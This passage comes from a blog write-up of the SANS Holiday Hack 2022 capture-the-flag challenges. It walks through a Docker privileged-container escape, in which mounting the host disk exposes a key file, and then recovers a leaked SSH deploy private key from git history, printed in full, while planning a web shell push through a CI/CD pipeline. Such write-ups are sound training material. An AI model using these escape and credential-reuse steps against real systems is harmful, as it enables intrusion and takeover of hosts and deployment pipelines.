Then runtoanswer and tell us the last word of the README.md file!
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Bow seems to try to clone the Git repository through SSH. If we try the
command, we can see that it indeed tries to connect through SSH (since we must
accept the SSH server key) and then fails because we don't have enough rights:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;bow@c573fb1d9664:~$&lt;/span&gt; git clone git@haugfactory.com:asnowball/aws_scripts.git
&lt;span class="go"&gt;Cloning into &amp;#39;aws_scripts&amp;#39;...&lt;/span&gt;
&lt;span class="go"&gt;The authenticity of host &amp;#39;haugfactory.com (34.171.230.38)&amp;#39; can&amp;#39;t be established.&lt;/span&gt;
&lt;span class="go"&gt;ECDSA key fingerprint is SHA256:CqJXHictW5q0bjAZOknUyA2zzRgSEJLmdMo4nPj5Tmw.&lt;/span&gt;
&lt;span class="go"&gt;Are you sure you want to continue connecting (yes/no/[fingerprint])? yes&lt;/span&gt;
&lt;span class="go"&gt;Warning: Permanently added &amp;#39;haugfactory.com,34.171.230.38&amp;#39; (ECDSA) to the list of known hosts.&lt;/span&gt;
&lt;span class="go"&gt;git@haugfactory.com: Permission denied (publickey).&lt;/span&gt;
&lt;span class="go"&gt;fatal: Could not read from remote repository.&lt;/span&gt;

&lt;span class="go"&gt;Please make sure you have the correct access rights&lt;/span&gt;
&lt;span class="go"&gt;and the repository exists.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Indeed, it seems that &lt;a class="reference external" href="https://stackoverflow.com/a/46993922"&gt;anonymous SSH access is not possible&lt;/a&gt;. So let's convert the command to use
HTTPS, which allows anonymous access:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;bow@c573fb1d9664:~$&lt;/span&gt; git clone https://haugfactory.com/asnowball/aws_scripts
&lt;span class="go"&gt;Cloning into &amp;#39;aws_scripts&amp;#39;...&lt;/span&gt;
&lt;span class="go"&gt;warning: redirecting to https://haugfactory.com/asnowball/aws_scripts.git/&lt;/span&gt;
&lt;span class="go"&gt;remote: Enumerating objects: 64, done.&lt;/span&gt;
&lt;span class="go"&gt;remote: Total 64 (delta 0), reused 0 (delta 0), pack-reused 64&lt;/span&gt;
&lt;span class="go"&gt;Unpacking objects: 100% (64/64), 23.83 KiB | 1.32 MiB/s, done.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Great, it works! Now let's look at the last word in the &lt;code&gt;README.md&lt;/code&gt; file
and answer:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;bow@c573fb1d9664:~$&lt;/span&gt; tail -n &lt;span class="m"&gt;1&lt;/span&gt; aws_scripts/README.md
&lt;span class="go"&gt;If you have run out of energy or time for your project, put a note at the top of the README saying that development has slowed down or stopped completely. Someone may choose to fork your project or volunteer to step in as a maintainer or owner, allowing your project to keep going. You can also make an explicit request for maintainers.&lt;/span&gt;
&lt;span class="gp"&gt;bow@c573fb1d9664:~$&lt;/span&gt; runtoanswer
&lt;span class="go"&gt;                                        Read that repo!&lt;/span&gt;
&lt;span class="go"&gt;What&amp;#39;s the last word in the README.md file for the aws_scripts repo?&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt; maintainers
&lt;span class="go"&gt;Your answer: maintainers&lt;/span&gt;

&lt;span class="go"&gt;Checking......&lt;/span&gt;
&lt;span class="go"&gt;Your answer is correct!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="Bow Ninecandle, same image as before." class="align-center" src="/images/sans-christmas-challenge-2022/bowninecandle.png" /&gt;
&lt;p&gt;&lt;em&gt;Bow Ninecandle says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Wow - great work! Thank you!&lt;/p&gt;
&lt;p&gt;Say, if you happen to be testing containers for security, there are some
things you should think about.&lt;/p&gt;
&lt;p&gt;Developers love to give ALL TeH PERMz so that things &amp;quot;just work,&amp;quot; but it
can cause real problems.&lt;/p&gt;
&lt;p&gt;It's always smart to check for excessive user and container permissions.&lt;/p&gt;
&lt;p&gt;You never know! You might be able to interact with host processes or
filesystems!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div class="section" id="prison-escape"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id9"&gt;Prison Escape&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We go on our merry watery way, where we find a house. We meet Tinsel Upatree:&lt;/p&gt;
&lt;img alt="Tinsel Upatree is an elf with a white mustache, a white sweater, blue pants, black snow boots and a green Christmas hat." class="align-center" src="/images/sans-christmas-challenge-2022/tinselupatree.png" /&gt;
&lt;p&gt;&lt;em&gt;Tinsel Upatree says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hiya hiya, I'm Tinsel Upatree!&lt;/p&gt;
&lt;p&gt;Check me out, I'm working side-by-side with a real-life Flobbit. Epic!&lt;/p&gt;
&lt;p&gt;Anyway, would ya' mind looking at this terminal with me?&lt;/p&gt;
&lt;p&gt;It takes a few seconds to start up, but then you're logged into a super
secure container environment!&lt;/p&gt;
&lt;p&gt;Or maybe it isn't so secure? I've heard about container escapes, and it has
me a tad worried.&lt;/p&gt;
&lt;p&gt;Do you think you could test this one for me? I'd appreciate it!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;According to our badge, we must get the content of the file
&lt;code&gt;/home/jailer/.ssh/jail.key.priv&lt;/code&gt;. Let's have a look:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Greetings Noble Player,

You find yourself in a jail with a recently captured Dwarven Elf.

He desperately asks your help in escaping for he is on a quest to aid a
friend in a search for treasure inside a crypto-mine.

If you can help him break free of his containment, he claims you would
receive &amp;quot;MUCH GLORY!&amp;quot;

Please, do your best to un-contain yourself and find the keys to both of
your freedom.
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This is most likely a Docker-escape challenge. Let's see if we are &lt;a class="reference external" href="https://stackoverflow.com/a/23558932"&gt;running in
a Docker container&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;grinchum-land:~$&lt;/span&gt; cat /proc/1/cgroup
&lt;span class="go"&gt;11:cpuset:/docker/517a4547bbc41db2dbf4b434b5a7fac6c5d75592e32e44dcd8fdb1be5348b5a4&lt;/span&gt;
&lt;span class="go"&gt;10:pids:/docker/517a4547bbc41db2dbf4b434b5a7fac6c5d75592e32e44dcd8fdb1be5348b5a4&lt;/span&gt;
&lt;span class="go"&gt;9:devices:/docker/517a4547bbc41db2dbf4b434b5a7fac6c5d75592e32e44dcd8fdb1be5348b5a4&lt;/span&gt;
&lt;span class="go"&gt;8:freezer:/docker/517a4547bbc41db2dbf4b434b5a7fac6c5d75592e32e44dcd8fdb1be5348b5a4&lt;/span&gt;
&lt;span class="go"&gt;7:blkio:/docker/517a4547bbc41db2dbf4b434b5a7fac6c5d75592e32e44dcd8fdb1be5348b5a4&lt;/span&gt;
&lt;span class="go"&gt;6:perf_event:/docker/517a4547bbc41db2dbf4b434b5a7fac6c5d75592e32e44dcd8fdb1be5348b5a4&lt;/span&gt;
&lt;span class="go"&gt;5:memory:/docker/517a4547bbc41db2dbf4b434b5a7fac6c5d75592e32e44dcd8fdb1be5348b5a4&lt;/span&gt;
&lt;span class="go"&gt;4:hugetlb:/docker/517a4547bbc41db2dbf4b434b5a7fac6c5d75592e32e44dcd8fdb1be5348b5a4&lt;/span&gt;
&lt;span class="go"&gt;3:net_cls,net_prio:/docker/517a4547bbc41db2dbf4b434b5a7fac6c5d75592e32e44dcd8fdb1be5348b5a4&lt;/span&gt;
&lt;span class="go"&gt;2:cpu,cpuacct:/docker/517a4547bbc41db2dbf4b434b5a7fac6c5d75592e32e44dcd8fdb1be5348b5a4&lt;/span&gt;
&lt;span class="go"&gt;1:name=systemd:/docker/517a4547bbc41db2dbf4b434b5a7fac6c5d75592e32e44dcd8fdb1be5348b5a4&lt;/span&gt;
&lt;span class="go"&gt;0::/docker/517a4547bbc41db2dbf4b434b5a7fac6c5d75592e32e44dcd8fdb1be5348b5a4&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Yeah, definitely a Docker container. Let's try &lt;a class="reference external" href="https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation"&gt;common Docker escape techniques&lt;/a&gt;
(shout out to &lt;a class="reference external" href="https://twitter.com/carlospolopm"&gt;&amp;#64;carlospolop&lt;/a&gt;, I often use
his &lt;a class="reference external" href="https://github.com/carlospolop/PEASS-ng"&gt;PEASS&lt;/a&gt; during engagements).&lt;/p&gt;
&lt;p&gt;The usual technique is to check if we're running in a privileged container. The
command to check is &lt;code&gt;capsh --print&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;grinchum-land:~$&lt;/span&gt; capsh --print
&lt;span class="go"&gt;-bash: capsh: command not found&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, we don't have the &lt;code&gt;capsh&lt;/code&gt; command. Another technique to check if
we're in a privileged container is to &lt;a class="reference external" href="https://betterprogramming.pub/escaping-docker-privileged-containers-a7ae7d17f5a1"&gt;use a command that necessitates a
privileged capacity&lt;/a&gt;.
Let's use the command given in &lt;a class="reference external" href="https://twitter.com/vickieli7"&gt;&amp;#64;vickieli7&lt;/a&gt;'s
article:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;grinchum-land:~$&lt;/span&gt; sudo ip link add dummy0 &lt;span class="nb"&gt;type&lt;/span&gt; dummy
&lt;span class="gp"&gt;grinchum-land:~$&lt;/span&gt; ip link sh dummy0
&lt;span class="go"&gt;2: dummy0: &amp;lt;BROADCAST,NOARP&amp;gt; mtu 1500 qdisc noop state DOWN qlen 1000&lt;/span&gt;
&lt;span class="go"&gt;    link/ether e2:9f:f0:fc:53:3e brd ff:ff:ff:ff:ff:ff&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It seems that it worked, yay! We're most likely running in a privileged
container. We can try to &lt;a class="reference external" href="https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#mounting-disk-poc1"&gt;mount the host's disk&lt;/a&gt;
so that we can access it through the container. Let's first find the correct
partition:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;grinchum-land:~$&lt;/span&gt; sudo fdisk -l
&lt;span class="go"&gt;Disk /dev/vda: 2048 MB, 2147483648 bytes, 4194304 sectors&lt;/span&gt;
&lt;span class="go"&gt;2048 cylinders, 64 heads, 32 sectors/track&lt;/span&gt;
&lt;span class="go"&gt;Units: sectors of 1 * 512 = 512 bytes&lt;/span&gt;

&lt;span class="go"&gt;Disk /dev/vda doesn&amp;#39;t contain a valid partition table&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The disk is apparently &lt;code&gt;/dev/vda&lt;/code&gt;, but it does not have a partition
table. Maybe we can try and mount it as is:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;grinchum-land:~$&lt;/span&gt; sudo mount /dev/vda /mnt
&lt;span class="gp"&gt;grinchum-land:~$&lt;/span&gt; ls /mnt
&lt;span class="go"&gt;bin   dev  home  lib32  libx32      media  opt   root  sbin  sys  usr&lt;/span&gt;
&lt;span class="go"&gt;boot  etc  lib   lib64  lost+found  mnt    proc  run   srv   tmp  var&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Looks good! Let's recover the &lt;code&gt;/mnt/home/jailer/.ssh/jail.key.priv&lt;/code&gt;
file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;grinchum-land:~$&lt;/span&gt; cat /mnt/home/jailer/.ssh/jail.key.priv

&lt;span class="go"&gt;                Congratulations!&lt;/span&gt;

&lt;span class="go"&gt;          You&amp;#39;ve found the secret for the&lt;/span&gt;
&lt;span class="go"&gt;          HHC22 container escape challenge!&lt;/span&gt;

&lt;span class="go"&gt;                     .--._..--.&lt;/span&gt;
&lt;span class="go"&gt;              ___   ( _&amp;#39;-_  -_.&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;          _.-&amp;#39;   `-._|  - :- |&lt;/span&gt;
&lt;span class="go"&gt;      _.-&amp;#39;           `--...__|&lt;/span&gt;
&lt;span class="go"&gt;   .-&amp;#39;                       &amp;#39;--..___&lt;/span&gt;
&lt;span class="go"&gt;  / `._                              \&lt;/span&gt;
&lt;span class="go"&gt;   `. `._               one           |&lt;/span&gt;
&lt;span class="go"&gt;     `. `._                           /&lt;/span&gt;
&lt;span class="go"&gt;       &amp;#39;. `._    :__________....-----&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;         `..`---&amp;#39;    |-_  _- |___...----..._&lt;/span&gt;
&lt;span class="go"&gt;                     |_....--&amp;#39;             `.`.&lt;/span&gt;
&lt;span class="go"&gt;               _...--&amp;#39;                       `.`.&lt;/span&gt;
&lt;span class="go"&gt;          _..-&amp;#39;                             _.&amp;#39;.&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;       .-&amp;#39;             step                _.&amp;#39;.&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;       |                               _.&amp;#39;.&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;       |                   __....------&amp;#39;-&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;       |     __...------&amp;#39;&amp;#39;&amp;#39; _|&lt;/span&gt;
&lt;span class="go"&gt;       &amp;#39;--&amp;#39;&amp;#39;&amp;#39;        |-  - _ |&lt;/span&gt;
&lt;span class="go"&gt;               _.-&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;-._&lt;/span&gt;
&lt;span class="go"&gt;            _.&amp;#39;                        |\&lt;/span&gt;
&lt;span class="go"&gt;          .&amp;#39;                         _.&amp;#39; |&lt;/span&gt;
&lt;span class="go"&gt;          `._          closer           |:.&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;            `._                     _.&amp;#39; |&lt;/span&gt;
&lt;span class="go"&gt;               `..__                 |  |&lt;/span&gt;
&lt;span class="go"&gt;                    `---.._.--.    _|  |&lt;/span&gt;
&lt;span class="go"&gt;                     | _   - | `-.._|_.&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;          .--...__   |   -  _|&lt;/span&gt;
&lt;span class="go"&gt;         .&amp;#39;_      `--.....__ |&lt;/span&gt;
&lt;span class="go"&gt;        .&amp;#39;_                 `--..__&lt;/span&gt;
&lt;span class="go"&gt;       .&amp;#39;_                         `.&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;      .&amp;#39;_    082bb339ec19de4935867   `-.&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;      `--..____                        _`.&lt;/span&gt;
&lt;span class="go"&gt;               ```--...____          _..--&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;                     | - _ ```---.._.&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;                     |   - _ |&lt;/span&gt;
&lt;span class="go"&gt;                     |_ -  - |&lt;/span&gt;
&lt;span class="go"&gt;                     |   - _ |&lt;/span&gt;
&lt;span class="go"&gt;                     | -_  -_|&lt;/span&gt;
&lt;span class="go"&gt;                     |   - _ |&lt;/span&gt;
&lt;span class="go"&gt;                     |   - _ |&lt;/span&gt;
&lt;span class="go"&gt;                     | -_  -_|&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The answer is &lt;code&gt;082bb339ec19de4935867&lt;/code&gt;.&lt;/p&gt;
&lt;img alt="Tinsel Upatree, same image as before." class="align-center" src="/images/sans-christmas-challenge-2022/tinselupatree.png" /&gt;
&lt;p&gt;&lt;em&gt;Tinsel Upatree says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Great! Thanks so much for your help!&lt;/p&gt;
&lt;p&gt;Now that you've helped me with this, I have time to tell you about the
deployment tech I've been working on!&lt;/p&gt;
&lt;p&gt;Continuous Integration/Continuous Deployment pipelines allow developers to
iterate and innovate quickly.&lt;/p&gt;
&lt;p&gt;With this project, once I push a commit, a GitLab runner will automatically
deploy the changes to production.&lt;/p&gt;
&lt;p&gt;WHOOPS! I didn’t mean to commit that to
&lt;a class="reference external" href="http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git"&gt;http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git&lt;/a&gt;...&lt;/p&gt;
&lt;p&gt;Unfortunately, if attackers can get in that pipeline, they can make an
awful mess of things!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div class="section" id="jolly-ci-cd"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id10"&gt;Jolly CI/CD&lt;/a&gt;&lt;/h3&gt;
&lt;img alt="Rippin Proudboot is a Flobbit with brown skin with brown curly hait. He's wearing a white shirt, a green jacket, black pants. His hairy feet are bare." class="align-center" src="/images/sans-christmas-challenge-2022/rippinproudboot.png" /&gt;
&lt;p&gt;&lt;em&gt;Rippin Proudboot says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Yes, hello, I'm Rippin Proudboot. Can I help you?&lt;/p&gt;
&lt;p&gt;Oh, you'd like to help me? Well, I'm not quite sure you can, but we shall
see.&lt;/p&gt;
&lt;p&gt;The elves here introduced me to this new CI/CD technology. It seems quite
efficient.&lt;/p&gt;
&lt;p&gt;Unfortunately, the sporcs seem to have gotten their grubby mits on it as
well, along with the Elfen Ring.&lt;/p&gt;
&lt;p&gt;They've used CI/CD to launch a website, and the Elfen Ring to power it.&lt;/p&gt;
&lt;p&gt;Might you be able to check for any misconfigurations or vulnerabilities in
their CI/CD pipeline?&lt;/p&gt;
&lt;p&gt;If you do find anything, use it to exploit the website, and get the ring
back!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let's connect to the terminal. Careful, once connected to the terminal, we must
still wait for the virtual environment to spin up other resources, so I advise
you to wait a couple of minutes before trying anything.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Greetings Noble Player,

Many thanks for answering our desperate cry for help!

You may have heard that some evil Sporcs have opened up a web-store selling
counterfeit banners and flags of the many noble houses found in the land of
the North! They have leveraged some dastardly technology to power their
storefront, and this technology is known as PHP!

***gasp***

This strorefront utilizes a truly despicable amount of resources to keep
the website up. And there is only a certain type of Christmas Magic capable
of powering such a thing… an Elfen Ring!

Along with PHP there is something new we&amp;#39;ve not yet seen in our land.
A technology called Continuous Integration and Continuous Deployment!

Be wary!

Many fair elves have suffered greatly but in doing so, they&amp;#39;ve managed to
secure you a persistent connection on an internal network.

BTW take excellent notes!

Should you lose your connection or be discovered and evicted the
elves can work to re-establish persistence. In fact, the sound off fans
and the sag in lighting tells me all the systems are booting up again right
now.

Please, for the sake of our Holiday help us recover the Ring and save
Christmas!
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Looks like the Sporcs are running a web-store powered by an Elfen Ring. If we
can compromise the web site, we can get our hands on the ring.&lt;/p&gt;
&lt;p&gt;If we look back at what Tinsel told us, he published an unexpected thing on
&lt;a class="reference external" href="http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git"&gt;http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git&lt;/a&gt;.
Let's clone the repository and have a look at the Git log:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;grinchum-land:~$&lt;/span&gt; git clone http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git
&lt;span class="go"&gt;Cloning into &amp;#39;wordpress.flag.net.internal&amp;#39;...&lt;/span&gt;
&lt;span class="go"&gt;remote: Enumerating objects: 10195, done.&lt;/span&gt;
&lt;span class="go"&gt;remote: Total 10195 (delta 0), reused 0 (delta 0), pack-reused 10195&lt;/span&gt;
&lt;span class="go"&gt;Receiving objects: 100% (10195/10195), 36.49 MiB | 20.78 MiB/s, done.&lt;/span&gt;
&lt;span class="go"&gt;Resolving deltas: 100% (1799/1799), done.&lt;/span&gt;
&lt;span class="go"&gt;Updating files: 100% (9320/9320), done.&lt;/span&gt;
&lt;span class="gp"&gt;grinchum-land:~$&lt;/span&gt; &lt;span class="nb"&gt;cd&lt;/span&gt; wordpress.flag.net.internal
&lt;span class="go"&gt;commit 37b5d575bf81878934adb937a4fff0d32a8da105&lt;/span&gt;
&lt;span class="gp"&gt;grinchum-land:~/wordpress.flag.net.internal$&lt;/span&gt; git log
&lt;span class="go"&gt;Author: knee-oh &amp;lt;sporx@kringlecon.com&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;Date:   Wed Oct 26 13:58:15 2022 -0700&lt;/span&gt;

&lt;span class="go"&gt;    updated wp-config&lt;/span&gt;

&lt;span class="go"&gt;commit a59cfe83522c9aeff80d49a0be2226f4799ed239&lt;/span&gt;
&lt;span class="go"&gt;Author: knee-oh &amp;lt;sporx@kringlecon.com&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;Date:   Wed Oct 26 12:41:05 2022 -0700&lt;/span&gt;

&lt;span class="go"&gt;    update gitlab.ci.yml&lt;/span&gt;

&lt;span class="go"&gt;commit a968d32c0b58fd64744f8698cbdb60a97ec604ed&lt;/span&gt;
&lt;span class="go"&gt;Author: knee-oh &amp;lt;sporx@kringlecon.com&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;Date:   Tue Oct 25 16:43:48 2022 -0700&lt;/span&gt;

&lt;span class="go"&gt;    test&lt;/span&gt;

&lt;span class="go"&gt;commit 7093aad279fc4b57f13884cf162f7d80f744eea5&lt;/span&gt;
&lt;span class="go"&gt;Author: knee-oh &amp;lt;sporx@kringlecon.com&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;Date:   Tue Oct 25 15:08:14 2022 -0700&lt;/span&gt;

&lt;span class="go"&gt;    add gitlab-ci&lt;/span&gt;

&lt;span class="go"&gt;commit e2208e4bae4d41d939ef21885f13ea8286b24f05&lt;/span&gt;
&lt;span class="go"&gt;Author: knee-oh &amp;lt;sporx@kringlecon.com&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;Date:   Tue Oct 25 13:43:53 2022 -0700&lt;/span&gt;

&lt;span class="go"&gt;    big update&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="go"&gt;commit e19f653bde9ea3de6af21a587e41e7a909db1ca5&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;Author: knee-oh &amp;lt;sporx@kringlecon.com&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;Date:   Tue Oct 25 13:42:54 2022 -0700&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="go"&gt;    whoops&lt;/span&gt;
&lt;/span&gt;
&lt;span class="go"&gt;commit abdea0ebb21b156c01f7533cea3b895c26198c98&lt;/span&gt;
&lt;span class="go"&gt;Author: knee-oh &amp;lt;sporx@kringlecon.com&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;Date:   Tue Oct 25 13:42:13 2022 -0700&lt;/span&gt;

&lt;span class="go"&gt;    added assets&lt;/span&gt;

&lt;span class="go"&gt;commit a7d8f4de0c594a0bbfc963bf64ab8ac8a2f166ca&lt;/span&gt;
&lt;span class="go"&gt;Author: knee-oh &amp;lt;sporx@kringlecon.com&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;Date:   Mon Oct 24 17:32:07 2022 -0700&lt;/span&gt;

&lt;span class="go"&gt;    init commit&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Commit &lt;code&gt;e19f653bde9ea3de6af21a587e41e7a909db1ca5&lt;/code&gt; has a message that
says &lt;code&gt;whoops&lt;/code&gt;. This is obviously a commit that tries to correct an error.
Let's see the difference between this commit and the previous one:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;grinchum-land:~/wordpress.flag.net.internal$&lt;/span&gt; git diff abdea0ebb21b156c01f7533cea3b895c26198c98..e19f653bde9ea3de6af21a587e41e7a909db1ca5
&lt;span class="go"&gt;diff --git a/.ssh/.deploy b/.ssh/.deploy&lt;/span&gt;
&lt;span class="go"&gt;deleted file mode 100644&lt;/span&gt;
&lt;span class="go"&gt;index 3f7a9e3..0000000&lt;/span&gt;
&lt;span class="go"&gt;--- a/.ssh/.deploy&lt;/span&gt;
&lt;span class="go"&gt;+++ /dev/null&lt;/span&gt;
&lt;span class="go"&gt;@@ -1,7 +0,0 @@&lt;/span&gt;
&lt;span class="go"&gt;------BEGIN OPENSSH PRIVATE KEY-----&lt;/span&gt;
&lt;span class="go"&gt;-b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW&lt;/span&gt;
&lt;span class="go"&gt;-QyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4gAAAJiQFTn3kBU5&lt;/span&gt;
&lt;span class="go"&gt;-9wAAAAtzc2gtZWQyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4g&lt;/span&gt;
&lt;span class="go"&gt;-AAAEBL0qH+iiHi9Khw6QtD6+DHwFwYc50cwR0HjNsfOVXOcv7AsdI7HOvk4piOcwLZfDot&lt;/span&gt;
&lt;span class="go"&gt;-PqBj2tDq9NBdTUkbZBriAAAAFHNwb3J4QGtyaW5nbGVjb24uY29tAQ==&lt;/span&gt;
&lt;span class="go"&gt;------END OPENSSH PRIVATE KEY-----&lt;/span&gt;
&lt;span class="go"&gt;diff --git a/.ssh/.deploy.pub b/.ssh/.deploy.pub&lt;/span&gt;
&lt;span class="go"&gt;deleted file mode 100644&lt;/span&gt;
&lt;span class="go"&gt;index 8c0b43c..0000000&lt;/span&gt;
&lt;span class="go"&gt;--- a/.ssh/.deploy.pub&lt;/span&gt;
&lt;span class="go"&gt;+++ /dev/null&lt;/span&gt;
&lt;span class="go"&gt;@@ -1 +0,0 @@&lt;/span&gt;
&lt;span class="go"&gt;-ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP7AsdI7HOvk4piOcwLZfDotPqBj2tDq9NBdTUkbZBri sporx@kringlecon.com&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The commit deletes two files, called &lt;code&gt;.ssh/.deploy&lt;/code&gt; and
&lt;code&gt;.ssh/.deploy.pub&lt;/code&gt;, a public/private SSH key pair. Given the name, it's
most likely an SSH key pair used to deploy to the Git repository.&lt;/p&gt;
&lt;p&gt;This means that we can most likely commit code to the Git repository. What's
more, we were told that there's a CI/CD mechanism that will automatically
deploy new versions of the website when there's a new commit. We can see that
in the CI/CD configuration file in the Git repository:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;grinchum-land:~/wordpress.flag.net.internal$&lt;/span&gt; cat .gitlab-ci.yml
&lt;span class="go"&gt;stages:&lt;/span&gt;
&lt;span class="go"&gt;  - deploy&lt;/span&gt;

&lt;span class="go"&gt;deploy-job:&lt;/span&gt;
&lt;span class="go"&gt;  stage: deploy&lt;/span&gt;
&lt;span class="go"&gt;  environment: production&lt;/span&gt;
&lt;span class="go"&gt;  script:&lt;/span&gt;
&lt;span class="go"&gt;    - rsync -e &amp;quot;ssh -i /etc/gitlab-runner/hhc22-wordpress-deploy&amp;quot; --chown=www-data:www-data -atv --delete --progress ./ root@wordpress.flag.net.internal:/var/www/html&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, if we commit a malicious file, say a web shell, it will be deployed on the
Sporcs web-store, and we can take control of it.&lt;/p&gt;
&lt;p&gt;Let's prepare our local environment so we can push to the Git repository using
the SSH key pair we found.&lt;/p&gt;
&lt;p&gt;First, we'll recover the private key:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;grinchum-land:~/wordpress.flag.net.internal$&lt;/span&gt; git checkout abdea0ebb21b156c01f7533cea3b895c26198c98
&lt;span class="go"&gt;Note: switching to &amp;#39;abdea0ebb21b156c01f7533cea3b895c26198c98&amp;#39;.&lt;/span&gt;

&lt;span class="go"&gt;You are in &amp;#39;detached HEAD&amp;#39; state. You can look around, make experimental&lt;/span&gt;
&lt;span class="go"&gt;changes and commit them, and you can discard any commits you make in this&lt;/span&gt;
&lt;span class="go"&gt;state without impacting any branches by switching back to a branch.&lt;/span&gt;

&lt;span class="go"&gt;If you want to create a new branch to retain commits you create, you may&lt;/span&gt;
